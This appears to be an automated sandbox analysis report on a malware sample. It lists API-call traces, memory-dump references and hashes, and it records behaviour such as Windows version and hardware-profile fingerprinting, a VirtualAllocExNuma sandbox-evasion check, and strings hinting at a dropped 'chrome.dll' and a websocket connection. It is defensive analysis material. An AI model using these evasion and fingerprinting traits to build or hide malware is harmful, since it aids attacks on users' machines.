                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressLibraryProc$FreeLoad
                                                                                                                                                                                                                                                          • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                                                                                                                                                                                                                                          • API String ID: 2256533930-1545816527
                                                                                                                                                                                                                                                          • Opcode ID: 513db1e216d392a8f8615afe8e8a16a5a65c2f5ded35c59e62fc2a327ef91c68
                                                                                                                                                                                                                                                          • Instruction ID: d5ce9c3829922ded3e7747f0ececd44025e05445e42ff4fd1d662a42779147dd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 513db1e216d392a8f8615afe8e8a16a5a65c2f5ded35c59e62fc2a327ef91c68
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F0ED70D413519FCB72AF72FD0D5963AE5BB28362B05842AFA44D610DEFBA8401AF40
                                                                                                                                                                                                                                                          Function 6CD60B6A Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __RTC_Initialize.LIBCMT ref: 6CD60BB1
                                                                                                                                                                                                                                                          • ___scrt_uninitialize_crt.LIBCMT ref: 6CD60BCB
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2442719207-0
                                                                                                                                                                                                                                                          • Opcode ID: c4fc907a6221121f30112cb8dd8442aaf7046a9ca4810f6c2cedce91afc6640b
                                                                                                                                                                                                                                                          • Instruction ID: a30a695a7f9a0ffa7c154a09cb18d2ae9b31489b4450918ebfffce09f7afdbf1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4fc907a6221121f30112cb8dd8442aaf7046a9ca4810f6c2cedce91afc6640b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5541C572E01298EFDB118F6BC840BAE7AB5EB417D8F118519E81567F60C730A905CBB8
                                                                                                                                                                                                                                                          Function 00FF0D53 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D67
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D6E
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,01015870,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0D9C
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(01015870,00000000,00000000,00000000,000000FF,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0DB8
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(01015870,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0DC1
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                          • String ID: Windows 11
                                                                                                                                                                                                                                                          • API String ID: 3466090806-2517555085
                                                                                                                                                                                                                                                          • Opcode ID: a8c68cf1f603b2c12c38d1e7ef81f1838f10d7019006df884a192739dc4021e3
                                                                                                                                                                                                                                                          • Instruction ID: 869d9a5d60b8f71a8e2546553105460518e385f0ce75c5586c40cdfae65bf48f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a8c68cf1f603b2c12c38d1e7ef81f1838f10d7019006df884a192739dc4021e3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6F04F75600209BFEB205BD1EC0EFBE7AB9EF84704F544014F701E5199EBB19900AB14
                                                                                                                                                                                                                                                          Function 00FF0DCC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0DE0
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0DE7
                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,01015870,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0E05
                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(01015870,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ), ref: 00FF0E20
                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(01015870,?,?,?,00FF0E3E,00FF0D7B,?,?,?,00FF4072,Windows: ,01015888), ref: 00FF0E29
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                          • String ID: CurrentBuildNumber
                                                                                                                                                                                                                                                          • API String ID: 3466090806-1022791448
                                                                                                                                                                                                                                                          • Opcode ID: 62c3cde62baf978702572b2c811dca918f5f591e513f32891fd12165dca4f55c
                                                                                                                                                                                                                                                          • Instruction ID: 254a5b9cc17808c74aa07b0f2586ef431af4f682249609233b9b362a06fcf409
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62c3cde62baf978702572b2c811dca918f5f591e513f32891fd12165dca4f55c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AF03A71640209BFEB205B91EC0EFAF7ABAEB84B04F648058F701A5199EBB159009B14
                                                                                                                                                                                                                                                          Function 00FE85FA Relevance: 9.1, APIs: 6, Instructions: 60filememoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8615
                                                                                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE862C
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8643
                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00FEE90A,?,?,?), ref: 00FE865A
                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00FEEECA,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8679
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00FEE90A,?,?,?), ref: 00FE8682
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2311089104-0
                                                                                                                                                                                                                                                          • Opcode ID: 7be388fbf2e6cfba05183786b8ba02ee68c56442c67a110b89efd5ea50648145
                                                                                                                                                                                                                                                          • Instruction ID: 12c95bfbcfd32060ccad34709f341b62ad0579f8c845759f571a3ab18712fb8c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7be388fbf2e6cfba05183786b8ba02ee68c56442c67a110b89efd5ea50648145
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16119D70900244EFDF21AFA5DC4CEAE7BB9EB84390F204548FA09A2194DB718E42EB50
                                                                                                                                                                                                                                                          Function 00FE10E0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 00FE109A
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE10C0
                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 00FE10D6
                                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00FF7F4E), ref: 00FE10F0
                                                                                                                                                                                                                                                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FE10F7
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00FE1102
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1859398019-0
                                                                                                                                                                                                                                                          • Opcode ID: 1ea66bbd864fb7ab8474b6ef0f7b77ad710644b252d5b2cdf813b5f924346068
                                                                                                                                                                                                                                                          • Instruction ID: 4a155ee3b0a278cff49d5902ad7ff3220d956242ad6385dc1253186b049d056d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ea66bbd864fb7ab8474b6ef0f7b77ad710644b252d5b2cdf813b5f924346068
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69F0F672B8135177F23252772C5DFAB2A6CAB41F62F204014F348EB2C0D7AA9944B774
                                                                                                                                                                                                                                                          Function 00FF18A7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF18F1
                                                                                                                                                                                                                                                            • Part of subcall function 00FF27A7: malloc.MSVCRT ref: 00FF27AC
                                                                                                                                                                                                                                                            • Part of subcall function 00FF27A7: strncpy.MSVCRT ref: 00FF27BD
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00FF1919
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,01015DFC,?,?,?,?,?), ref: 00FF1936
                                                                                                                                                                                                                                                          • GetCurrentHwProfileA.ADVAPI32(?), ref: 00FF18C2
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                                                          • String ID: Unknown
